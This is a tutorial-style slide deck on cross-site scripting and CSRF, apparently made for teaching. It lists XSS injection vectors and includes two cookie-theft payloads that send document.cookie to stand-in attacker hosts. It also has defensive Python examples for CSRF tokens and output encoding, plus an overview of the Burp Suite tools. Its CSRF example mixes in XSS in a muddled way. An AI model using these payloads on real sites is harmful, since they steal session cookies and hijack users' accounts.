(XSS)
by Amit Tyagi
What is XSS
Cross Site Scripting
XSS is a vulnerability which, when present in websites or web applications, allows malicious users (hackers) to insert their own client-side code (normally JavaScript) into those web pages. When this malicious code is displayed in the web client (browsers like IE, Mozilla etc.) together with the original web page, it lets the hacker gain greater access to that page.
XSS input
Note: This image has been created using Firebug and this XSS hole is not present in google.com
XSS contd.
[Diagram: the Hacker's Browser sends an http request with XSS JavaScript to the Server; the Server returns an http response with the XSS JavaScript, which is rendered in the Hacker's Browser.]
XSS output
Note: This image has been created using Firebug and this XSS hole is not present in google.com
XSS vectors
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascr&#105;pt:aler;t('XSS')>
Non-persistent
Here the XSS code is only displayed in the next page to the same user and is not saved into persistent storage like a database. This type of attack is less severe, because the hacker can only see their own cookies and can only make modifications in the pages currently open in their own browser. The risk with these kinds of XSS holes is that they open the way for Cross Site Request Forgery (CSRF). CSRF allows a hacker to place some links in a bad website (see the CSRF slide).
Example: same as given previously to explain XSS
CSRF
Cross-site request forgery is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. This can be done by placing some hidden links in some bad website.
For example:
<img src="http://bank.example/withdraw?account=bob<script>document.location=http://baddomain.com/store_data?cookie= + document.cookie;</script>
CSRF
[Diagram: Bad Server 1 returns an http response containing the CSRF link (<img src="http://bank.example/withdraw?account=bob<script>document.location=http://baddomain.com/store_data?cookie= + document.cookie;</script>) to the Normal User's Browser; the browser sends the http request with XSS to the Bank Server, and the http response with XSS is relayed to Bad Server 2.]
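The forged withdraw link above works because the bank only needs Bob's session cookie, and the browser attaches that cookie to any request for bank.example, whichever page triggered it. What follows is an added example, not code from the slides, of the three server-side checks that defeat it: refusing GET for a state change (an <img> can only ever issue GET), comparing the Origin/Referer header with the site's own origin, and requiring a per-session synchronizer token in the form. The handler, the dict-shaped request, SITE_ORIGIN and the in-memory SESSIONS store are this example's own assumptions standing in for a real framework.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.example"   # assumed origin of the site being protected

# Constructed in-memory session store: session id -> CSRF token for that session.
SESSIONS: dict = {}


def issue_csrf_token(session_id: str) -> str:
    """Create a fresh random token for the session; embed it in forms as a hidden field."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    return token


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def handle_withdraw(request: dict) -> str:
    """Hypothetical /withdraw handler. `request` is a plain dict with keys
    method, headers, cookies and form, standing in for a real framework object."""
    headers = request.get("headers", {})
    cookies = request.get("cookies", {})
    form = request.get("form", {})

    session_id = cookies.get("session", "")
    if session_id not in SESSIONS:
        return "401 not logged in"

    # 1. A state change must not be reachable by GET: an <img src=...> on a bad
    #    page can only ever issue a GET, so the slide's forged link stops here.
    if request.get("method", "GET").upper() != "POST":
        return "405 withdraw requires POST"

    # 2. If the browser tells us where the request came from, it must be our own site.
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None and _origin_of(source) != SITE_ORIGIN:
        return "403 cross-origin request"

    # 3. Synchronizer token: the form must echo the secret tied to this session.
    #    compare_digest avoids leaking the token through timing differences.
    submitted = str(form.get("csrf_token", ""))
    expected = SESSIONS[session_id]
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return "403 missing or invalid CSRF token"

    return f"200 withdraw from account {form.get('account', '?')}"


if __name__ == "__main__":
    token = issue_csrf_token("bob-session")
    forged = {"method": "GET", "cookies": {"session": "bob-session"},
              "headers": {"Referer": "http://baddomain.com/page"}}
    legit = {"method": "POST", "cookies": {"session": "bob-session"},
             "headers": {"Origin": "https://bank.example"},
             "form": {"account": "bob", "csrf_token": token}}
    print(handle_withdraw(forged))   # 405 ...
    print(handle_withdraw(legit))    # 200 ...
```

The three checks are layered on purpose: the method check alone stops img-style links, the origin check catches forged POSTs from pages that send an Origin header, and the token is the check that does not depend on what the browser chooses to send. Note that the token must be stored per session and never in a cookie alone, since anything in a cookie is exactly what the forged request already carries.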
Persistent XSS
In the persistent type of XSS attack, the XSS code gets saved into persistent storage like a database along with other data and is then visible to other users as well. One example of this kind of attack is blog websites, where a hacker can add their XSS code along with the comment text; if no validation or filtering is present on the server, the XSS code is successfully saved into the database. After this, whenever any other user opens the page in their browser, the XSS code executes and can perform a variety of harmful actions. This type of attack is more severe, because the hacker can steal cookies and make modifications in the page. The risk with these kinds of attacks is that any third-party hacker can use this vulnerability to perform actions on behalf of other users.
abc<script>window.location = "http://www.hackers.com?yid=" + document.cookie;</script>
[Diagram: the XSS JavaScript is stored in the DB with the comment data; the http response with the XSS JavaScript is then served to the Normal User's Browser.]
Persistent XSS
Note: This image has been created using Firebug and this XSS hole is not
present in blogger.com
DOM-based XSS
In DOM-based XSS the payload executes because client-side script in the victim's browser writes attacker-controlled data (for example from the URL) into the page. This is in contrast to the other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page (due to a server-side flaw).
Example
http://www.vulnerable.site/welcome.html?name=Joe
Prevention
Never trust the user input data, no matter where it is coming from (GET, POST, COOKIE etc.).
Validation at server
By sanitizing the input data, we can prevent malicious code from entering the system. Checking for the proper data types helps in cleaning the data: first of all we should restrict numeric fields to numeric data and text fields to alphanumeric characters only.
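The per-field rules above close off numeric and short text fields, but a blog comment like the one in the persistent XSS slide legitimately contains punctuation, so it cannot be restricted to alphanumerics. The practitioner's answer is to validate what can be validated on input and HTML-encode everything at output time. This is an added example, not code from the slides, covering both the persistent XSS comment scenario and the Prevention rules: the field patterns, the ValidationError class, the render_comment functions and the constructed SAMPLE_COMMENT (which carries the slide's own payload) are this example's assumptions.

```python
import html
import re

# Constructed comment submission carrying the slide's persistent-XSS payload.
SAMPLE_COMMENT = ('abc<script>window.location = "http://www.hackers.com?yid=" '
                  '+ document.cookie;</script>')

# Per-field input rules, as the slide recommends: digits only for numeric
# fields, alphanumerics only for short text fields (assumed field names).
FIELD_RULES = {
    "post_id": re.compile(r"[0-9]{1,10}"),
    "username": re.compile(r"[A-Za-z0-9]{1,32}"),
}


class ValidationError(ValueError):
    pass


def validate_field(name: str, value: str) -> str:
    """Reject any value that does not match the field's whole-string pattern."""
    if not FIELD_RULES[name].fullmatch(value):
        raise ValidationError(f"{name}: rejected {value!r}")
    return value


def is_valid(name: str, value: str) -> bool:
    """Boolean wrapper around validate_field for callers that just want a verdict."""
    try:
        validate_field(name, value)
        return True
    except ValidationError:
        return False


def render_comment_unsafe(username: str, comment: str) -> str:
    """The 'before' picture: raw concatenation, so a stored <script> runs in
    every visitor's browser (this is the flaw the slide describes)."""
    return f"<p><b>{username}</b>: {comment}</p>"


def render_comment(username: str, comment: str) -> str:
    """The hardened version: free text is stored as-is and HTML-encoded at
    output time. html.escape turns < > & " ' into character references, so
    the browser shows the payload as text instead of executing it."""
    return f"<p><b>{html.escape(username)}</b>: {html.escape(comment)}</p>"


def is_script_free(rendered_html: str) -> bool:
    """Crude check used by the demo below: no raw <script tag survives encoding."""
    return "<script" not in rendered_html.lower()


if __name__ == "__main__":
    user = validate_field("username", "amit")
    for field, value in (("post_id", "42"), ("post_id", "42<script>")):
        print(field, repr(value), "accepted" if is_valid(field, value) else "rejected")
    print(render_comment_unsafe(user, SAMPLE_COMMENT))  # script tag intact
    print(render_comment(user, SAMPLE_COMMENT))         # &lt;script&gt; ... shown as text
```

The encoding in render_comment is correct for text placed in HTML body or attribute context; data written into a JavaScript string, a URL, or a CSS value needs the encoding for that context instead, which is why the check is done where the data is output, not where it is stored.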
Burp Suite
Burp Tools
Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the end browser and the target web application, allowing you to intercept, inspect and modify the raw traffic passing in both directions.
Spider - an intelligent application-aware web spider which allows complete enumeration of an application's content and functionality.
Scanner [Pro version only] - an advanced tool for performing automated discovery of security vulnerabilities in web applications.
Intruder - a highly configurable tool for automating customized attacks against web applications, such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities.
Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and analyzing the application's responses.
Sequencer - a tool for analyzing the quality of randomness in an application's session tokens or other important data items which are intended to be unpredictable.
Decoder - a tool for performing manual or intelligent decoding and encoding of application data.
Comparer - a utility for performing a visual "diff" between any two items of data, normally pairs of related requests and responses.
Burp Suite
How to use
Run
Questions
References
http://en.wikipedia.org
http://ha.ckers.org/xss.html
http://portswigger.net
Thank you